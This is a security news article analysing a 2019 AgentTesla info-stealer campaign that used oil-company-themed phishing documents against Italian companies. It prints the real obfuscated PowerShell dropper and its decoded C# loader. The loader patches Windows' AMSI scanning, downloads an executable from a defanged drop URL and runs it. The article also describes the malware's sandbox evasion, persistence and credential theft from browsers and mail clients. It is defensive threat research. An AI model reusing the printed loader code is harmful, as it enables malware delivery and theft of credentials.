Commodity Malware Reborn: The AgentTesla “Total Oil” themed Campaign

Pierluigi Paganini September 20, 2019

Agent Tesla is a fully customizable password info-stealer offered as malware-as-a-service, many cyber criminals are choosing it as their preferred recognition tool.  


Nowadays the Malware-As-A-Service is one of the criminal favorite ways to breach security perimeter. Agent Tesla is one of these “commodity malware”. It is a fully customizable password info-stealer and many cyber criminals are choosing it as their preferred recognition tool.  

During our monitoring operations we discovered an infection-chain designed to deliver this kind of malware to some Italian companies. The attack has been carried out impersonating personnel from the Liberian division of a global Oil Corporate. The malicious email message were spoofed, but the reference to the employee was realistic and suggests he may have conducted some preliminary OSINT.

Technical Analysis

ThreatMacro Dropper
Brief DescriptionAgent Tesla Doc Macro Dropper

Table 1. Static information about the doc macro

The document uses a common phishing schema, it invites the user to enable the macro execution due to compatibility reasons with older Microsoft Office versions. The document contains an obfuscated VBA macro.

Figure 1: Screen of the fake document
Figure 2: Piece of the malicious macro

Despite the variable names and the altered code flow, the macro simply decodes its hidden payload and then executes it. In fact, after a series of text replacement the document spawns another Powershell script.

  1. powershell -WindowStyle Hidden
  2. function b72f3 { param($l74b5) $l557ad = ‘bc9b4’;$l63acc = ”; for ($i = 0; $i -lt $l74b5.length; $i+=2) { $f3ed5fa = [convert]::ToByte($l74b5.Substring($i, 2), 16); $l63acc += [char]($f3ed5fa -bxor $l557ad[($i / 2) % $l557ad.length]); } return $l63acc;}
  3. $k61b35e = ‘1710500c534230401140070e0217470b0d5e42671b104d07594c314c0c400b0e5c4c7d0c175c105b12305c10420b005c110f1710500c534230401140070e17265d0304570d47160a5a110f1710500c534230401140070e172b7b59164a0b5a05436a1b471606544c7a0717026f3e12165b0e5d01435a0e55111019120d5b020a045619387d0e582b0e490d46164b1b0951100d5c0e07504115275a161140325b0b0d4d5f1625064d32460d0078065010064a11164b3e191241000f500114111758165d01435c1a40071157427d0c1769164642155856020354112b5a16334d101403050d55000056151140100a57051403510d57034b586226580e2a54125b101711405f071157075851511b4e14270d4d104d320c500c40425e1940780d025d2e5d001158104d404a6442441701550b5742104d03400b0019074c16064b0c142b0d4d324010434c06055656084a471611500c5342090d0600005610596f260f552b59120c4b161c40085c105a070f0a50164e437c0c40101a690d5d0c170440620b114d17550e334b0d4007004d401d3f434917560e0a5a424716024d0b574206411651100d19005b0d0f190f0d5b5b0b010c4a2a571664161119115204050157004e36700c4032174b425e57510a54554e434c0b5a16434b5606550215425b171719175d0c17190f0c035a0d4b0f3927550e7d0f135610404a417207460c065551064c07550e164e437c0c40101a690d5d0c17044066160f740d42072e5c0f5b101a1b4e1431064d2e5511177c10460d110404550e105c4b6942104d03400b0019074c16064b0c14140c50061408005f0006504b700c4032174b425904525b5a182b0d4d324010435d015506520c4e5d0c1719090057555b4b0f12165b0e5d01434a1655160a5a425d0c17190d0c53050f551c4b18700c4032174b425107050b5703425e19175053570c531c00540b04074a410951040757585256530209540404560c401d4b5850041c07065f5001555e042b5a16334d101a38064b0d1d190456165b420f0b57010158442b5a16334d10140000585455035e4f030054020e4a5107050b57034e010e5052514b1b500752060d030400550e520552510c5506525708520052560c01055241104b0f0b0511005703555803095f2a5716641611173851100c1019530d1756425850560c010f1f36700c4032174b425007555f51094a36700c4032174b4b015916500c4042070c0102535e09595d044b180f0d5b5b0b010c4a015a0302030215065154050a4e041a57094e5b17171906010155084b1d190456165b420f0b5701015844204d1606623f140752005552005b0419041a50084e041a055f4e041a5a091f0f2b0d4d32401043520751515a585f7903114a0a550e4d780e580d007125580d01580e1c514a022f5510105103584c2056124d4a06085b030401014e044e085c07075b0215511d59095a04565051110c511543700c4032174b4a5601020f03554c37562b5a16550d4a1d49534152045301104e5f07060a5b554e5010595850560c010e42345c00770e0a5c0c4042115d53075a5a040c5115436e0756210f50075a164b1059471611500c53421a5b0755555a04275a140a4b0d5a0f0657161a25064d245b0e075c10640317514a710c1550105b0c0e5c0c404c304907570b0255245b0e075c101a2313490e5d01024d0b5b0c275816554b481b3e681a50585a05034112000350050a4a16560009540053530e401d59115d53075a5a17265b150d550d550625500e514a010e5052514b1b525553540d060550535c565056000d070557570a565752010c5a04015609530453550d0304035258520552000c560006570a530656060c0304065658530252550c550554525b530652050d010457565d5257535308540451565f525653530c5604555709565053560c520455570a530556000e060555570f500152010c5a0404550d5250535008550455575a5203404a151b5607020e5b1d59334b0d5707104a314003114d2b5a040c190c0150005c04515f0d5c1514321156015111106a16551017700c520d4b4000510354004b0f3211560151111017314003114d4a5a57515a0752074a02105116164b0c145258441241000f500114111758165d01434a16460b0d5e425655515f511c11174b0b5a05434a53525557584b4f11174b0b5a054358040055575b570940015a5b565641021140100a5705141707085601535e6a16460b0d5e4c710f134d1b0f040c4b4a5d0c17190b095258505e4753050e56554c2f5c0c53160b020b1f5f511019561b175c424203570f03035f20560c4207114d4c600d214016514a10080403560217314100104d105d0c04110b18504a1553024b584c060556560849094a005103464b4b4f030054020e426a42025f560356010c391c0b4c0b4b14474358040055575b571a2e065705400a3e10594910064d17460c434c060556560859491f’;$k61b35e2 = b72f3($k61b35e);
  4. Add-Type -TypeDefinition $k61b35e2;[p99a3fb]::o81f67();

Code Snippet 1

The Powershell stage is substantially composed of three parts: the first is the declaration of  function “b72f3()”, having the purpose to deobfuscate the second part of the script, contained into the “$k61b35e” variable. It actually is a C# source code snippet, compiled and loaded within the Powershell process at execution time. Once loaded, the third part of the script invokes the “o81f67()” method of the just compiled “p99a3fb” class.

  1. using System;
  2. using System.Runtime.InteropServices;
  3. using System.Diagnostics;
  4. using System.IO;
  5. using System.Net;
  6. public class p99a3fb{
  7. [DllImport(“kernel32″,EntryPoint=”GetProcAddress”)]
  8. public static extern IntPtr va46a7(IntPtr af474b5,string a2457);
  9. [DllImport(“kernel32”, EntryPoint = “LoadLibrary”)] public static extern IntPtr ud1451(string j4d4b5);
  10. [DllImport(“kernel32″, EntryPoint=”VirtualProtect”)] public static extern bool m9982c8(IntPtr sfff854,UIntPtr j5236a, uint r427a, out uint m8a94);
  11. [DllImport(“Kernel32.dll”, EntryPoint=”RtlMoveMemory”, SetLastError=false)] static extern void jcfb22(IntPtr mf1b8,IntPtr dcad15,int k456b);
  12. public static int o81f67(){
  13. IntPtr eef257 = ud1451(b72f3(“030e4a0b1a060f55”));
  14. if(eef257==IntPtr.Zero){goto l255c;}
  15. IntPtr bca6aa=va46a7(eef257,b72f3(“230e4a0b67010257204104055c10”));
  16. if(bca6aa==IntPtr.Zero){goto l255c;}
  17. UIntPtr de6f3=(UIntPtr)5;
  18. uint d5c61=0;
  19. if(!m9982c8(bca6aa,de6f3,0x40,out d5c61)){goto l255c;}
  20. Byte[] e197fb8={0x31,0xff,0x90};
  21. IntPtr kee39a=Marshal.AllocHGlobal(3);
  22. Marshal.Copy(e197fb8,0,kee39a,3);
  23. jcfb22(new IntPtr(bca6aa.ToInt64()+0x001b),kee39a,3);
  24. l255c: WebClient rd1389=new WebClient();
  25. string ybea79=Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)+”\\x3a81a”+b72f3(“4c064107”);
  26. rd1389.DownloadFile(b72f3(“0a174d120e4d4c4e15434c0b580c5010164a0a1a010c544d43124e5a0d5a160657161b120f4c055d0c1016035f0b105407404d15500743114c7d1746250b580f640d1317074c07”),ybea79);
  27. ProcessStartInfo n52cefe=new ProcessStartInfo(ybea79);
  28. Process.Start(n52cefe);
  29. return 0;
  30. }
  31. public static string b72f3(string s1f74a){
  32. string af474b5=”bc9b4″;
  33. string ud1451=String.Empty;
  34. for(int i=0;
  35. i<s1f74a.Length;
  36. i+=2){
  37. byte va46a7=Convert.ToByte(s1f74a.Substring(i,2),16);
  38. ud1451+=(char)(va46a7 ^ af474b5[(i/2) % af474b5.Length]);
  39. } return ud1451;
  40. }
  41. }

Code snippet 2

Code Snippet 2 is the C# class to be loaded. It has the objective to download the payload from the drop url previosly decoded by the “b72f3()” function: “hxxp://www.handrush[.com/wp-content/plugins/akismet/views/DurGhamPop[.exe”

The payload is stored into “%APPDATA%\Roaming” path and it is immediately executed through the “Process.Start()” function.

The Loader

ThreatAgent Tesla Loader
Brief DescriptionAgent Tesla .NET C# loader

Table 2. Static information about the AgentTesla evasive loader

The dropped file payload is a .NET executable embedding some anti-analysis tricks. If it is executed on a virtual environment, the malware kills itself. It also uses some anti-debugging trick to decide if terminate its execution.

Figure 3: Method after which the process kills itself

According to the MSDN documentation, the method Delegate.CreateDelegate “creates a delegate of the specified type that represents the specified static method of the specified class, with the specified case-sensitivity and the specified behavior on failure to bind“. This way, the control flow is switched to the delegated method which actually points to a DLL containing the anti-analysis logic.

Figure 4: Loading routine of the internal DLL

Before passing the control to the “swety.dll” library, which is a sort of helper component with no particular scope except the identification of analysis environments, the first instructions executed here are designed to decode and load a byte array embedded inside the executable, unpacking the obfuscated code.

Figure 5: Decoding routine of the DLL

The Figure above shows how this payload is encoded within the byte array and the routine invoked to retrieve it. This byte array is actually a well-formed dll loaded through the “Thread.GetDomain().Load()” method. At this point, the control finally passes to the “swety.dll” library, the module in charge to detect the analysis environment.

The “Swety” Module

ThreatSwety evasion module
Brief Description.NET Swety evasion module

Table 3. Static information about the “swety” evasive module

This component is always a .NET executable. The name of the classes are self-explicative: for instance, there are clear references to Virtual Machine detection logic. 

Figure 6: Example of the enumeration of the Hypervisors

In Figure 9, the malware retrieves the information about the current hardware and compares it with a defined set of criteria, when it finds a match, it kills itself. Otherwise, the dll continues its execution and loads another PE file hidden inside the initial loader. This last executable file runs as a new thread within the initial loader context.

Figure 7: Loading of the AgentTesla final payload

The Payload 

ThreatAgent Tesla
Brief DescriptionAgent Tesla Payload

Table 4. Static information about the AgentTesla payload

The extracted payload is a .NET binary file. AgentTesla and Hawkey have lots of pieces of code in common, and the analysis we made two months ago about the Hawkeye payload is similar to this one.

Figure 8: Recurrent string decryption routine through the usage of Rijndael algorithm

Also in this case every sensitive information, string or other information  is encrypted through Rijndael algorithm and it tries to evade the sandbox to the common user names of the principal sandboxes. The persistence mechanisms is practically the same and the installation path of detected during the analysis is “%APPDATA%/Roaming/SecondLORI/SecondLORI.exe” 

Figure 9: Sandbox evasion trick
Figure 10: Persistence mechanism

After its installation, the malware starts to retrieve all the credential stored within a wide list of web browsers, FTP clients, File Downloaders etc. For instance, it is able to steal accounts from:

  • Google Chrome
  • Yandex
  • Comodo Dragon
  • Cool Novo
  • Chromium
  • Torch Browser
  • 7Star
  • Amigo
  • Brave
  • Cent Browser
  • Chedot
  • Coccoc
  • Elements Browser
  • Epic Privacy
  • Kometa
  • Orbitum
  • Sputnik
  • Uran
  • Vivaldi
  • UC Browser
  • Flock Browser
  • CoreFTP
  • FileZilla
  • JDownloader
  • QQBrowser
  • Outlook
  • SeaMonkey
  • Thunderbird

The harvested credentials are then sent back to the attacker servers. The malware leverages the .NET API to easily set up a mail client to transmit the loot to a particular mailbox.

Figure 11: SMTP client account configuration

The name of the sender, “Lori”, matches the name in the persistence mechanism, “SecondLORI”. This username may belong to a previously compromised email account the attacker uses as a sort of SMTP relay to deliver the loot to the real exfiltration address, a GMail mailbox named “[email protected]”. 

Figure 12: SMPT communication


As we stated in the previous post about a custom weaponization of the Hawkeye info-stealer, these kinds of malware are well known and highly used by cyber criminals. But despite their popularity event into the info-sec community, these “commodity tools” still result to be quite effective especially when combined within custom multistage infection chains, renewing their dangerousness and effectiveness.

Further technical details, including Indicators of Compromise, are reported in the analysis published by the experts at the Cybaz-Yoroi ZLAB.

[adrotate banner=”9″] [adrotate banner=”12″]

Pierluigi Paganini

(SecurityAffairs – AgentTesla, malware)

[adrotate banner=”5″]

[adrotate banner=”13″]

you might also like

leave a comment